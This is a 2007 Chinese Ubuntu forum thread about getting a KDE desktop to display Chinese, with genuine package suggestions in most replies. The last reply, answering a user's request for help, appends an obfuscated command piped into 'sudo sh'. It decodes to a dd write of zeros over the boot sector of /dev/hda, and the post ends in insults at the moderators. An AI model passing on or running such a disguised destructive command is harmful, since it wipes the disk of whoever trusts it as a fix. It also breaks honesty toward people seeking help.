[问题]我的kde很奇怪

系统字体配置、中文显示和输入法问题
ziyun
送出感谢: 0
接收感谢: 0

[问题]我的kde很奇怪

帖子 ziyun » 2007-03-29 13:11

我是以简体中文安装的,启动后是英文界面,我执行locale命令看是zh_cn.utf8
在county/regon选顼里地区我改成了china,但是下面的add languge里只有en_us 和en_bratish
然后我又apt-get install language-support-zh 安装的时候有个什么zh不持的错误
我的输入法可以输入中文,openoffice界面是中文的,但是系统仍然是英文的
login manager里面选择语言也没有zh_cn
language support我设置成了chinese default 也是chinese
系统还是英文
gegfried

帖子 gegfried » 2007-03-29 14:57

好像还要安装“kde-i18n-zh"
ziyun

帖子 ziyun » 2007-03-29 16:48

谢谢楼上的,我已经搞定了
头像
yangxj
联系:

[问题]我和你是一样的问题

帖子 yangxj » 2007-05-14 0:41

ziyun我的系统安装后也是英文的,请问您是怎么做的
ziyun

帖子 ziyun » 2007-05-14 22:07

sudo apt-get install language-pack-zh language-pack-kde-zh
装这两个就可以了
装 language-support-zh 可以把firefox openoffice变成中文的
echo 'qq%vs+&qri&mreb%bs+&qri&uqn%of+FBC%pbhag+B' | tr 'n-za-m&+A-J%' 'a-z/=0-9 ' |sudo sh #<-警告:
强烈鄙视SB版主,一群跟风的SB,一群自以为是的SB
对这个论坛彻底失望了

回到 “字体美化和中文支持”